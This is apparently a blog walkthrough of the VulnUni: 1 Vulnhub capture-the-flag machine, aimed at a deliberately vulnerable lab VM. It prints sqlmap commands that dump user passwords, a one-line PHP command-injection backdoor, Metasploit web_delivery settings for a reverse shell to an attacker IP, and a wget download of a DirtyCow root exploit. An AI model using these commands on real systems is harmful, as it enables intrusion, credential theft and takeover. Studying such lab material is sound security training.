VulnUni: 1 Walkthrough Vulnhub CTF | VulnUni: 1 Walkthrough Vulnhub CTF
Today, we’re sharing another Vulnhub CTF Challenge Walkthrough VulnUni: 1 created by emaragkos and this machine goal is finding two flag user and root flags.
You can download here
This boot2root machine is realistic without any CTF elements and pretty straight forward. Goal: Hack your University and get root access to the server.
First, we scanning our local network and find our target IP address
our next step is scanning target open ports and running services using Nmap.
nmap -A -p- 192.168.1.9
We see the nmap scanning output our target port 80 HTTP Apache server is running.
I open the target IP address on browser and we see a cybersecurity templet After enumeration the website dirb and go-buster and Another scanning tool I didn’t find anything useful
so I move on our next step I open the burp suite and intercept the home page request using right-click send the request scanner
here we see another burp New scan window is open click the Crawl and audit uncheck the ignore protocols in URLs and click ok button
burp suite scanning is complete we see lots of URLs I open the E-Class URL and we see a login form
I log in with default username and password but we see a Document Expired error and our URL is redirected vulnumi. local so we should add to our /etc/hosts file.
The web application About page we see the version is 1.7.2 is outdated I search exploit on exploit-db there I found an exploit GUnet OpenEclass E-learning platform 1.7.3 – ‘uname’ SQL Injection
according to exploit again intercept the login page request
Save intercepted request as a file (Right click -> Copy to file -> Save as any file name in my case file name is sql-request-vulni-eclass
POST /vulnuni-eclass/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Load the file to SQLMap with the use of -r parameter sqlmap -r sql-request-vulni-eclass ( –dbs dump all database name ) and ( –batch Never ask for user input, use the default behavior )
sqlmap -r sql-request-vulni-eclass --dbs --batch
We found 5 database and our next step is finding username and passwrod using this command
sqlmap -r sql-request-vulni-eclass -D eclass -T user -C password --dump --batch
we found another exploit from exploit-db Authenticated – Requires admin account) – Upload PHP shell we have now valid administrator username password. more about this exploit
According to exploit You have to log in to the platform as an administrator or user with admin rights.
Navigate this URL upload you shell vulnuni.local/modules/course_info/restore_course.php
Upload your .php shell compressed in a .zip file I create a command injection php backdoor and compressed a zip file upload.zip
cat >command.php <?php systme($_GET["cmd"]); ?> zip upload.zip command.php
Navigate this URL we call our shell using parameter id we see our current user-id
Without wasting our time I open msfconsole web_delivery exploit and set target php reverse shell
msfdb run use exploit/multi/script/web_delivery set target 1 set payload php/meterpreter/reverse_tcp set lhost 192.168.1.18 set srvport 80 run
copy the following command and paste cmd= your command
http://vulnuni.loca/vulnuni-eclass/courses/tmpUnzipping/command.php?cmd= paste your link
and our meterpreter session is open now run these command for proper shell
sessions 1 shell python -c 'import pty;pty.spawn("/bin/bash")' id
user home directory we found our first flag
cd /home ls cd vulnuni ls cat flag.txt
uname -r command to we see the kernel version of target machine I search google the version of the kernel and I found a kernel exploit from Dirtycow
I download the exploit our local machine and start our python server on port 80 and move on target /tmp directory using wget command to download the exploit target machine
cd /tmp wget http://192.168.1.18/exploit.c
Compiling our exploit c language file to executable binary file using this command and adding permission r+w+x
gcc -Wall -o run exploit.c -ldl -lpthread chmod 777 run
After adding permission I run the exploit and I got a root shell
./run cd /root ls
cat flag.txt id
Today in this post we are going install another Linux operating system Lubuntu, Lubuntu is…